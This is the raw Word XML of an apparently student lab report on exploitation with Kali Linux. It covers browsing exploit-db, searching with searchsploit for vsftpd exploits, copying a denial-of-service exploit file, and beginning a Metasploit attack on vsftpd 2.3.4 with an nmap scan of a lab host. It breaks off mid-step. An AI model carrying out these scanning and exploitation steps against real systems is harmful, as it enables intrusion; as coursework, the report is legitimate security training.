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23070A" w14:textId="3E3AF499" w:rsidR="005364C2" w:rsidRPr="005364C2" w:rsidRDefault="008E26C0" w:rsidP="005364C2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E26C0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Part 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D1E3B9" w14:textId="25056B10" w:rsidR="005364C2" w:rsidRDefault="005364C2" w:rsidP="005364C2">
      <w:r w:rsidRPr="005364C2">
        <w:t xml:space="preserve">1.1 In a Kali terminal, enter a sequence of commands to achieve a screenshot similar to the one below. Write your sequence of commands into your report. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E232923" w14:textId="50F09AD0" w:rsidR="00050A48" w:rsidRPr="005364C2" w:rsidRDefault="00050A48" w:rsidP="005364C2">
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00113E48">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Step 1: cd /usr/share/exploitdb</w:t>
      </w:r>
      <w:r w:rsidRPr="00113E48">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
        <w:t>Step 2: ls -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001A08ED" w14:textId="2FB522FB" w:rsidR="005364C2" w:rsidRDefault="0078495C" w:rsidP="005364C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C25F43F" wp14:editId="3F07F7AB">
            <wp:extent cx="5731510" cy="36512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47C1" w14:textId="3623F57C" w:rsidR="006D1C2D" w:rsidRPr="006D1C2D" w:rsidRDefault="006D1C2D" w:rsidP="006D1C2D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26424E0F" w14:textId="27F375A3" w:rsidR="004E42A9" w:rsidRPr="004E42A9" w:rsidRDefault="006D1C2D" w:rsidP="004E42A9">
      <w:r w:rsidRPr="006D1C2D">
        <w:t xml:space="preserve">1.2 Examine the contents of files_exploits.csv with a text editor such as nano, vi, mousepad, etc. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B9561C" w14:textId="41F4C941" w:rsidR="004E42A9" w:rsidRDefault="004E42A9" w:rsidP="004E42A9">
      <w:r w:rsidRPr="004E42A9">
        <w:t xml:space="preserve">a) General knowledge: what is a csv file? (You can google this) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB58B79" w14:textId="7CB30FD2" w:rsidR="001D0418" w:rsidRPr="001D0418" w:rsidRDefault="006F6690" w:rsidP="001D0418">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D0418">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>A comma-separated values file is a delimited text file that uses a comma to separate values. Each line of the file is a data record. Each record consists of one or more fields, separated by commas. The use of the comma as a field separator is the source of the name for this file format.</w:t>
      </w:r>
      <w:r w:rsidR="0050531C" w:rsidRPr="001D0418">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> Typically opened up using </w:t>
      </w:r>
      <w:r w:rsidR="006A0A3A" w:rsidRPr="001D0418">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="0050531C" w:rsidRPr="001D0418">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>xcel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB48F41" w14:textId="7C72E6EB" w:rsidR="001D0418" w:rsidRDefault="001D0418" w:rsidP="001D0418">
      <w:r w:rsidRPr="001D0418">
        <w:t xml:space="preserve">b) What are contained in the first line of files_exploits.csv? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A27423" w14:textId="59048D6E" w:rsidR="00FF1635" w:rsidRPr="00FF1635" w:rsidRDefault="00833653" w:rsidP="00FF1635">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">First Line: </w:t>
      </w:r>
      <w:r w:rsidRPr="00833653">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>id,file,description,date,author,type,platform,port</w:t>
      </w:r>
      <w:r w:rsidRPr="00833653">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
        <w:t>These are the headings of the table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4E1284" w14:textId="77777777" w:rsidR="00FF1635" w:rsidRPr="00FF1635" w:rsidRDefault="00FF1635" w:rsidP="00FF1635">
      <w:r w:rsidRPr="00FF1635">
        <w:t xml:space="preserve">c) What is the purpose of files_exploits.csv? (please give an educated guess based on its contents) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AC76A3" w14:textId="50F5E39B" w:rsidR="006F249F" w:rsidRPr="006F249F" w:rsidRDefault="00BE2970" w:rsidP="006F249F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C43A9A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">A list of exploits </w:t>
      </w:r>
      <w:r w:rsidR="00446779">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">that are available for use </w:t>
      </w:r>
      <w:r w:rsidRPr="00C43A9A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">with information </w:t>
      </w:r>
      <w:r w:rsidRPr="00446779">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>about</w:t>
      </w:r>
      <w:r w:rsidR="00446779" w:rsidRPr="00446779">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> their location, description</w:t>
      </w:r>
      <w:r w:rsidR="00446779">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>, OS platform</w:t>
      </w:r>
      <w:r w:rsidR="00446779" w:rsidRPr="00446779">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> and other </w:t>
      </w:r>
      <w:r w:rsidR="00446779" w:rsidRPr="00576EA1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>things.</w:t>
      </w:r>
      <w:r w:rsidR="00576EA1" w:rsidRPr="00576EA1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> The program may need to use this information as means to identify the location</w:t>
      </w:r>
      <w:r w:rsidR="00576EA1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> or queries</w:t>
      </w:r>
      <w:r w:rsidR="00576EA1" w:rsidRPr="00576EA1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the programs which are used to exploit </w:t>
      </w:r>
      <w:r w:rsidR="00576EA1" w:rsidRPr="004565A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>vulnerabilities.</w:t>
      </w:r>
      <w:r w:rsidR="00032E77" w:rsidRPr="004565A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> Possibly in relation to “search</w:t>
      </w:r>
      <w:r w:rsidR="00676A16">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sploit</w:t>
      </w:r>
      <w:r w:rsidR="00032E77" w:rsidRPr="004565A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>” function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6EC00F" w14:textId="77913105" w:rsidR="001E75E9" w:rsidRPr="001E75E9" w:rsidRDefault="006F249F" w:rsidP="001E75E9">
      <w:r w:rsidRPr="006F249F">
        <w:t xml:space="preserve">1.3 Explore what is contained in the directory 'exploits'. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CAF0E4" w14:textId="09DC764B" w:rsidR="001E75E9" w:rsidRDefault="001E75E9" w:rsidP="001E75E9">
      <w:r w:rsidRPr="001E75E9">
        <w:t xml:space="preserve">a) Name three directories under the directory ‘exploits’ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E6C746" w14:textId="7FCD8E7C" w:rsidR="00B940AD" w:rsidRDefault="00B940AD" w:rsidP="00B940AD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B940AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>1: windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00B940AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
        <w:t>2: android</w:t>
      </w:r>
      <w:r w:rsidRPr="00B940AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
        <w:t>3: ruby</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE03478" w14:textId="169EC533" w:rsidR="00113E48" w:rsidRPr="00B940AD" w:rsidRDefault="00113E48" w:rsidP="00B940AD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64000660" wp14:editId="71BC2BCD">
            <wp:extent cx="3298965" cy="17759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42394" cy="1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8EC9" w14:textId="26570554" w:rsidR="00B940AD" w:rsidRDefault="00B940AD" w:rsidP="00B940AD">
      <w:r w:rsidRPr="00B940AD">
        <w:t xml:space="preserve">b) Name three directories under the directory ‘exploits/windows’ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1D5DC8" w14:textId="4579284B" w:rsidR="00B940AD" w:rsidRDefault="00B940AD" w:rsidP="00B940AD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B940AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>1: dos</w:t>
      </w:r>
      <w:r w:rsidRPr="00B940AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">2: </w:t>
      </w:r>
      <w:r w:rsidR="006A6FC4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>local</w:t>
      </w:r>
      <w:r w:rsidRPr="00B940AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
        <w:t>3: remote</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45921DB1" w14:textId="12D4421B" w:rsidR="006A6FC4" w:rsidRDefault="006A6FC4" w:rsidP="00B940AD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73F8CDA9" wp14:editId="2AF6D404">
            <wp:extent cx="3733800" cy="148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0FE2" w14:textId="50BAA534" w:rsidR="003F4877" w:rsidRDefault="003F4877" w:rsidP="00B940AD">
      <w:r w:rsidRPr="003F4877">
        <w:t>c) Look at the content of the Python file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003F4877">
        <w:t>‘exploits/windows/local/10240.py’. According to the comments in this file, which computer program it is used to exploit?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1BAE5A" w14:textId="3E3299A3" w:rsidR="007023A7" w:rsidRPr="007023A7" w:rsidRDefault="007023A7" w:rsidP="007023A7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00B776E0" w:rsidRPr="00B776E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Millenium MP3 Studio 2.</w:t>
      </w:r>
      <w:r w:rsidR="00B776E0" w:rsidRPr="007023A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="007023A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B385CE2" w14:textId="57FB93B6" w:rsidR="007023A7" w:rsidRPr="007023A7" w:rsidRDefault="007023A7" w:rsidP="007023A7">
      <w:r w:rsidRPr="007023A7">
        <w:t xml:space="preserve">1.4 Suppose you want to search for exploits from the local installation of expoit-db at Kali to attack the FTP server program VSFTPD version 2.3.2. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C50243D" w14:textId="695E98B6" w:rsidR="007023A7" w:rsidRDefault="007023A7" w:rsidP="007023A7">
      <w:r w:rsidRPr="007023A7">
        <w:t xml:space="preserve">a) What is your command line for this? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501CB181" w14:textId="02821F9C" w:rsidR="00530A00" w:rsidRPr="00530A00" w:rsidRDefault="0039423F" w:rsidP="00530A00">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039423F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>‘searchsploit VSFTPD 2.3.2’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D278DA" w14:textId="77777777" w:rsidR="00530A00" w:rsidRPr="00530A00" w:rsidRDefault="00530A00" w:rsidP="00530A00">
      <w:r w:rsidRPr="00530A00">
        <w:t xml:space="preserve">b) Include a screenshot on the output of your command line. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13741469" w14:textId="3E759769" w:rsidR="0039423F" w:rsidRPr="0039423F" w:rsidRDefault="004B6F39" w:rsidP="003942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3E6871" wp14:editId="7CA40883">
            <wp:extent cx="5731510" cy="3608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7806" w14:textId="77777777" w:rsidR="007023A7" w:rsidRPr="007023A7" w:rsidRDefault="007023A7" w:rsidP="007023A7"/>
    <w:p w14:paraId="2F202F83" w14:textId="77777777" w:rsidR="004C7A68" w:rsidRPr="004C7A68" w:rsidRDefault="004C7A68" w:rsidP="004C7A68">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A1E7AEA" w14:textId="7CF19FD8" w:rsidR="004C7A68" w:rsidRDefault="004C7A68" w:rsidP="004C7A68">
      <w:r w:rsidRPr="004C7A68">
        <w:t xml:space="preserve"> c) Which exploit from the output you will select? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FF743F" w14:textId="288BCF0F" w:rsidR="0047058E" w:rsidRDefault="000459A1" w:rsidP="0047058E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Exploit Title: vsftpd 2.3.2 – Denial of Service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Path: </w:t>
      </w:r>
      <w:r w:rsidR="00202780">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00BB3A75" w:rsidRPr="00202780">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="004C7A68" w:rsidRPr="00202780">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>inux/dos/16270.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F2C1CF" w14:textId="7C3D3599" w:rsidR="00E9220C" w:rsidRPr="0047058E" w:rsidRDefault="00E9220C" w:rsidP="0047058E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="533E2292" wp14:editId="78223EA5">
            <wp:extent cx="5731510" cy="6559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01D" w14:textId="4382A1B7" w:rsidR="008F7651" w:rsidRPr="008F7651" w:rsidRDefault="0047058E" w:rsidP="008F7651">
      <w:r w:rsidRPr="0047058E">
        <w:t xml:space="preserve">1.5 The exploit code you choose in Task 1.4 should be 'exploits/linux/dos/16270.c'. Copy this file to '/home/kali/Downloads' directory for possible use in future. </w:t>
      </w:r>
      <w:r w:rsidR="00D20AE7">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D20AE7" w:rsidRPr="00D20AE7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D20AE7" w:rsidRPr="00D20AE7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Note: There have been updates made to searchsploit and the “exploits” is no longer part of the path</w:t>
      </w:r>
      <w:r w:rsidR="00FD0C68">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>; probably because it is assumed</w:t>
      </w:r>
      <w:r w:rsidR="00D20AE7" w:rsidRPr="00D20AE7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D20AE7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D20AE7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D20AE7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B1B2671" wp14:editId="7DD977A2">
            <wp:extent cx="5731510" cy="6559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903C" w14:textId="7E6CD40B" w:rsidR="008F7651" w:rsidRDefault="008F7651" w:rsidP="008F7651">
      <w:r w:rsidRPr="008F7651">
        <w:t xml:space="preserve">a) Write your commands to achieve this into your lab report. (Hint: studying the ‘cp’ command in Linux) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC8BFBD" w14:textId="4093F485" w:rsidR="002C3394" w:rsidRPr="002C3394" w:rsidRDefault="00C97F01" w:rsidP="002C3394">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97F01">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cp /usr/share/exploitdb/exploits/linux/dos/16270.c home/kali/Downloads</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97F01">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7089F4" w14:textId="07185DEC" w:rsidR="002C3394" w:rsidRDefault="002C3394" w:rsidP="002C3394">
      <w:r w:rsidRPr="002C3394">
        <w:t xml:space="preserve">b) Include a screenshot to prove that ‘16270.c’ is now under the ‘home/kali/Downloads’ directory. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD7E4C6" w14:textId="501B6E5C" w:rsidR="002C3394" w:rsidRPr="002C3394" w:rsidRDefault="003D1312" w:rsidP="002C3394">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47659537" wp14:editId="76E2F578">
            <wp:extent cx="5731510" cy="36023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61F2" w14:textId="264A05F7" w:rsidR="00D304B7" w:rsidRPr="00C33908" w:rsidRDefault="00D304B7" w:rsidP="00C33908">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D304B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Part 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C58F903" w14:textId="1929D0FC" w:rsidR="00E95C7A" w:rsidRPr="00E95C7A" w:rsidRDefault="00C33908" w:rsidP="00E95C7A">
      <w:r w:rsidRPr="00C33908">
        <w:t xml:space="preserve">2. MSF: attacking VSFTPD 2.3.4 (NB: different version number from Task 1.4). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C559B32" w14:textId="189C8433" w:rsidR="00E95C7A" w:rsidRDefault="00E95C7A" w:rsidP="00E95C7A">
      <w:r w:rsidRPr="00E95C7A">
        <w:t xml:space="preserve">a) According to the report, what is the CVSS score for this vuln? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478845B5" w14:textId="77C10208" w:rsidR="009044B4" w:rsidRPr="009044B4" w:rsidRDefault="009044B4" w:rsidP="00E95C7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009044B4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>7.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1366A466" w14:textId="2093BC50" w:rsidR="001523C8" w:rsidRPr="001523C8" w:rsidRDefault="009044B4" w:rsidP="001523C8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4035E64F" wp14:editId="1AFCB76F">
            <wp:extent cx="5731510" cy="4521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4B4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001523C8">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="415A9937" w14:textId="77777777" w:rsidR="001523C8" w:rsidRDefault="001523C8" w:rsidP="001523C8">
      <w:r w:rsidRPr="001523C8">
        <w:t xml:space="preserve">b) Which section in the vuln details reveals the vsftpd version number affected by this vuln? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD2AB17" w14:textId="73CF30CB" w:rsidR="001523C8" w:rsidRPr="001523C8" w:rsidRDefault="001523C8" w:rsidP="001523C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001523C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1F6D7DD1" wp14:editId="5ABA32CC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>195888</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5575935" cy="504190"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20403"/>
                <wp:lineTo x="21548" y="20403"/>
                <wp:lineTo x="2154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23C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>“Affected Software/OS”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481F9A5C" w14:textId="1CB040FB" w:rsidR="001523C8" w:rsidRPr="001523C8" w:rsidRDefault="001523C8" w:rsidP="001523C8">
      <w:r w:rsidRPr="001523C8">
        <w:t xml:space="preserve">2.2 Follow the ‘VSFTPD’ section in the following blog article: https://tehaurum.wordpress.com/2015/06/14/metasploitable-2-walkthrough-an-exploitation-guide/ to exploit this vuln. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F71A7C4" w14:textId="30B98E90" w:rsidR="001523C8" w:rsidRDefault="001523C8" w:rsidP="001523C8">
      <w:r w:rsidRPr="001523C8">
        <w:t xml:space="preserve">a) Include every step with the command lines involved into your lab report. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A236A2" w14:textId="4C2CF0C9" w:rsidR="000F4C1B" w:rsidRDefault="000F1011" w:rsidP="00BB049D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F1011">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Step 1: nmap -sV -O 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="001659BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="000F1011">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001659BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>103</w:t>
      </w:r>
      <w:r w:rsidRPr="000F1011">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p1-65535</w:t>
      </w:r>
      <w:r w:rsidR="00C83FB8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C83FB8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00C83FB8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00C83FB8" w:rsidRPr="00C83FB8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: Identify TCP port 21 with vulnerability vsftpd which can </w:t>
      </w:r>
      <w:r w:rsidR="00BD359C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r w:rsidR="00C83FB8" w:rsidRPr="00C83FB8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">be </w:t>
      </w:r>
